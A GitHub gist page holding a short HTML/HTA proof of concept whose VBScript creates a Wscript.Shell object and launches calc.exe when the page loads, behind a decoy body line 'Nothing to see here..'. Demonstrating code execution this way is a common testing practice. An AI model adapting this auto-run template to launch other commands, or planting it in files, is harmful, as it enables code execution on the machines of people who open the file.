Skip to content

Instantly share code, notes, and snippets.

@binarytrails
Last active March 1, 2023 20:42
Show Gist options
  • Save binarytrails/b701bcc6ea1d8e7aaa1aeb6ef96e15c2 to your computer and use it in GitHub Desktop.
Save binarytrails/b701bcc6ea1d8e7aaa1aeb6ef96e15c2 to your computer and use it in GitHub Desktop.
calc
<html>
<head>
<script language="VBScript">
Sub RunProgram
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End Sub
RunProgram()
</script>
</head>
<body>
Nothing to see here..
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment